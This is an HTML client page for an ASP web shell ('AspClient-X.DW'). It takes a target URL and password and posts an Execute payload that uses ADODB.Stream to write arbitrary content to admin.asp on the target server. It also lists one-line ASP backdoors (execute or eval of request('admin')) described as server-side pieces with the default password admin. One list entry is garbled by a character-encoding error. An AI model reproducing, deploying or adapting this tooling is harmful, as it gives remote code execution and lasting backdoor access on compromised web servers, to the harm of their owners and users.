<html>
<head>
<title>AspClient-X.DW</title>
<style type="text/css">
<!--
body {
 background-color: #055235;
 
}
.bad {
 border: 1px solid #000000;
 font-size: 12px;
}
-->
</style>
</head>
<body bgcolor="#FFFFFF" link="#FFFFFF" vlink="#FFFF00" alink="#FFFFFF">
<center>
<div style="width: 350; line-height: 35pt; font-size:16pt; font-family:Comic Sans MS; color: #FFFFFF; position: relative;
filter:glow(color=#FF0000, strength=15)"><b>Focus on web application security.</b></div>
<table width="627" border="0" align="center" class="bad" height="14" cellspacing="0">
<tr>
<td height="1" width="794">
<form method="post" name="pass">
<font color="#000000">URL:</font><input name="act" type="text" id="act" size="93" value="http://"> <input type="submit" value="go" onClick="this.form.cnnsc.name=this.form.password.value;this.form.action=this.form.act.value;">
<br>
PWD:<input name="password" type="text" id="password" value="" size="93">
<input type="hidden" name="cnnsc" id="cnnsc" value="Execute(&quot;Session(&quot;&quot;cnnsc&quot;&quot;)=request(&quot;&quot;*&quot;&quot;):Execute(Session(&quot;&quot;cnnsc&quot;&quot;))&quot;)">
</td>
</tr>
<tr>
<td height="100" width="794">
<textarea name="*" cols="100" rows="9" width="45">
set lP=server.createObject("Adodb.Stream")
lP.Open
lP.Type=2
lP.CharSet="gb2312"
lP.writetext request("pass")
lP.SaveToFile server.mappath("admin.asp"),2
lP.Close
set lP=nothing
response.redirect "admin.asp"</textarea>
</td>
</tr>
<tr>
<td height="1" width="794">
<textarea name="pass" cols="100" rows="15" width="45">
</textarea>
</td>
</tr>
<tr>
<td width="794" height="7">
<FONT color=#00ff00><STRONG>本程序提供四个服务端，默认连接密码为admin</STRONG></FONT>
<br>
1. ┼癥污爠煥敵瑳∨摡業≮┩>
<br>
2. &lt;%execute request(&quot;<font color="red">admin</font>&quot;)%&gt;
<br>
3. &lt;%execute(request(&quot;<font color="red">admin</font>&quot;))%&gt;
<br>
4. &lt;%eval request(&quot;<font color="red">admin</font>&quot;)%&gt;
</td>
</tr>
</table>
</body>
</html>